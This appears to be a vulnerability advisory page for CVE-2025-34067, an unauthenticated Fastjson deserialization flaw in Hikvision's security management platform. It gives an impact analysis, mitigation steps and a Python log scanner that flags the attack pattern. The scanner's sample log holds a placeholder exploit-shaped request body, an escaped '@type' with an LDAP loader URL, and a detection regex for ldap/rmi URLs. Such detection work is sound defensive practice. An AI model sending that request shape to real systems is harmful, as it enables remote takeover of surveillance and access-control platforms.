
CVE-2025-34067: CWE-502 Deserialization of Untrusted Data in Hikvision Integrated Security Management Platform

Severity: Critical
Type: Vulnerability | Tags: CVE-2025-34067, CWE-502, CWE-917
Published: Wed Jul 02 2025 (07/02/2025, 13:44:21 UTC)
Source: CVE Database V5
Vendor/Project: Hikvision
Product: Integrated Security Management Platform

Description

An unauthenticated remote command execution vulnerability exists in the applyCT component of the Hikvision Integrated Security Management Platform due to the use of a vulnerable version of the Fastjson library. The endpoint /bic/ssoService/v1/applyCT deserializes untrusted user input, allowing an attacker to trigger Fastjson's auto-type feature to load arbitrary Java classes. By referencing a malicious class via an LDAP URL, an attacker can achieve remote code execution on the underlying system.

AI-Powered Analysis

AI analysis last updated: 07/02/2025, 14:10:44 UTC

Technical Analysis

CVE-2025-34067 is a critical unauthenticated remote code execution (RCE) vulnerability affecting Hikvision's HikCentral platform, formerly known as the Integrated Security Management Platform. The vulnerability arises from the use of a vulnerable version of the Fastjson library within the applyCT component, specifically at the endpoint /bic/ssoService/v1/applyCT. Fastjson is a Java library used for JSON parsing and serialization. This vulnerability exploits Fastjson's auto-type feature, which allows dynamic loading of Java classes during deserialization. An attacker can send specially crafted input that triggers the deserialization of untrusted data, referencing malicious Java classes via an LDAP URL. This leads to arbitrary code execution on the underlying system without requiring any authentication or user interaction. The vulnerability is classified under CWE-502 (Deserialization of Untrusted Data) and CWE-917 (Improper Neutralization of Special Elements used in an LDAP Query), highlighting the unsafe deserialization and LDAP injection aspects. The CVSS 4.0 base score is 10.0, indicating a critical severity with network attack vector, no required privileges or user interaction, and high impact on confidentiality, integrity, and availability. No patches or mitigations have been officially released at the time of publication, and there are no known exploits in the wild yet. However, given the nature of the vulnerability and the criticality of the affected platform, exploitation could lead to full system compromise, enabling attackers to manipulate security management functions, access sensitive surveillance data, or disrupt security operations.

Potential Impact

For European organizations, the impact of this vulnerability is significant due to the widespread use of Hikvision's security management solutions in critical infrastructure, government facilities, transportation hubs, and commercial enterprises. Successful exploitation could allow attackers to gain full control over the security management platform, potentially disabling surveillance systems, tampering with access controls, or exfiltrating sensitive video and security data. This could lead to severe breaches of physical security, privacy violations, and operational disruptions. The unauthenticated nature of the vulnerability increases the risk of remote exploitation by threat actors, including cybercriminals and nation-state adversaries. Given the central role of HikCentral in integrated security environments, the vulnerability could also facilitate lateral movement within networks, enabling further compromise of enterprise IT and OT systems. The potential for widespread impact is heightened by the lack of available patches and the maximum CVSS score, requiring urgent attention from European organizations relying on Hikvision products.

Mitigation Recommendations

1. Immediate network-level mitigation: restrict external and untrusted network access to the /bic/ssoService/v1/applyCT endpoint using firewalls, network segmentation, or web application firewalls (WAFs).
2. Disable the Fastjson auto-type feature if possible, by configuring the application or applying custom patches, to prevent dynamic class loading during deserialization.
3. Monitor network traffic and logs for suspicious LDAP requests or unusual activity targeting the vulnerable endpoint.
4. Implement strict input validation and filtering at the application layer to block malicious payloads attempting to exploit deserialization.
5. Engage with Hikvision support and monitor official advisories for patches or updates addressing this vulnerability; apply them promptly once available.
6. Conduct a thorough security audit of all Hikvision devices and management platforms to identify exposure, and implement compensating controls such as multi-factor authentication and enhanced monitoring.
7. Consider temporarily disabling or isolating vulnerable HikCentral instances until a secure patch is deployed.
8. Educate security teams on the indicators of compromise related to Fastjson deserialization attacks to enable rapid detection and response.
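The monitoring in step 3 can be automated against reverse-proxy or WAF logs. The following Python script is an added example written for this page; it is not part of the advisory and not Hikvision or VulnCheck code. It assumes a tab-separated log format (timestamp, source IP, method, path, status, truncated request body) that is constructed here, uses the endpoint path named in the advisory, and treats Fastjson's `@type` key as the auto-type marker. It parses each body as JSON before matching so that escaped spellings of the key are normalised, and falls back to a raw-text check for malformed bodies. The class name and IP addresses in the sample lines are placeholders, not a working payload.

```python
"""Flag proxy-log entries matching the CVE-2025-34067 request pattern (added example)."""
from __future__ import annotations

import json
import re
from dataclasses import dataclass, field

# Endpoint named in the advisory.
VULNERABLE_ENDPOINT = "/bic/ssoService/v1/applyCT"
# Fastjson selects the class to instantiate from the "@type" key (auto-type).
AUTOTYPE_KEY = "@type"
# The advisory describes the class being referenced via an LDAP URL; rmi:// is
# included because it plays the same role in JNDI lookups.
REMOTE_LOADER = re.compile(r"\b(?:ldaps?|rmi)://", re.IGNORECASE)


@dataclass
class Finding:
    line_no: int
    src_ip: str
    severity: str
    reasons: list[str] = field(default_factory=list)


def _walk(node, keys: list[str], strings: list[str]) -> None:
    """Collect every object key and every string value in a parsed JSON document."""
    if isinstance(node, dict):
        for k, v in node.items():
            keys.append(k)
            _walk(v, keys, strings)
    elif isinstance(node, list):
        for v in node:
            _walk(v, keys, strings)
    elif isinstance(node, str):
        strings.append(node)


def analyse_body(body: str) -> list[str]:
    """Return the reasons a request body looks like an auto-type/JNDI attempt.

    Parsing first means an escaped key such as "\\u0040type" is seen as "@type";
    a substring check on the raw body would miss it. A body that is not valid
    JSON is checked as raw text so truncated or malformed requests are not skipped.
    """
    keys: list[str] = []
    strings: list[str] = []
    try:
        _walk(json.loads(body), keys, strings)
        autotype = AUTOTYPE_KEY in keys
    except json.JSONDecodeError:
        strings.append(body)
        autotype = AUTOTYPE_KEY in body
    reasons = []
    if autotype:
        reasons.append("fastjson auto-type key '@type' present")
    if any(REMOTE_LOADER.search(s) for s in strings):
        reasons.append("JNDI-style remote loader URL (ldap/rmi) in body")
    return reasons


def parse_line(line: str) -> dict[str, str] | None:
    """Assumed log format: ts TAB src_ip TAB method TAB path TAB status TAB body."""
    parts = line.rstrip("\n").split("\t", 5)
    if len(parts) != 6:
        return None  # malformed line: skip it rather than abort the scan
    ts, ip, method, path, status, body = parts
    return {"ts": ts, "ip": ip, "method": method, "path": path,
            "status": status, "body": body}


def scan_log(lines) -> list[Finding]:
    findings: list[Finding] = []
    for n, line in enumerate(lines, 1):
        rec = parse_line(line)
        if rec is None:
            continue
        # Compare the path without its query string; other endpoints are ignored.
        if rec["path"].split("?", 1)[0] != VULNERABLE_ENDPOINT:
            continue
        reasons = analyse_body(rec["body"])
        if reasons:
            severity = "high" if len(reasons) == 2 else "medium"
            findings.append(Finding(n, rec["ip"], severity, reasons))
    return findings


# Constructed sample log; class name and addresses are placeholders.
SAMPLE_LOG = [
    "\t".join(["2025-07-02T13:50:01Z", "10.0.0.12", "POST", VULNERABLE_ENDPOINT, "200",
               '{"userName":"alice","token":"abc"}']),          # benign SSO traffic
    "\t".join(["2025-07-02T13:50:02Z", "10.0.0.13", "POST", "/bic/other", "200",
               '{"@type":"x"}']),                                # other endpoint, ignored
    "\t".join(["2025-07-02T13:51:07Z", "198.51.100.7", "POST", VULNERABLE_ENDPOINT + "?x=1", "500",
               '{"\\u0040type":"PLACEHOLDER_CLASS","cfg":[{"url":"ldap://198.51.100.7:1389/obj"}]}']),
    "\t".join(["2025-07-02T13:51:09Z", "198.51.100.7", "POST", VULNERABLE_ENDPOINT, "400",
               '{"@type":"PLACEHOLDER_CLASS", broken']),        # truncated body
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no} {f.src_ip} [{f.severity}]: {'; '.join(f.reasons)}")
```

Run as-is it reports two findings: the escaped-key request with the nested LDAP URL as high, and the truncated body that still carries the auto-type key as medium. In production the same `analyse_body` check belongs in front of the endpoint (WAF rule or request filter), not only in retrospective log review, since the advisory notes no vendor patch is available yet.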


Technical Details

Data Version: 5.1
Assigner Short Name: VulnCheck
Date Reserved: 2025-04-15T19:15:22.549Z
CVSS Version: 4.0
State: PUBLISHED

Threat ID: 68653a166f40f0eb7292c948

Added to database: 7/2/2025, 1:54:30 PM

Last enriched: 7/2/2025, 2:10:44 PM

Last updated: 7/26/2025, 8:42:53 PM
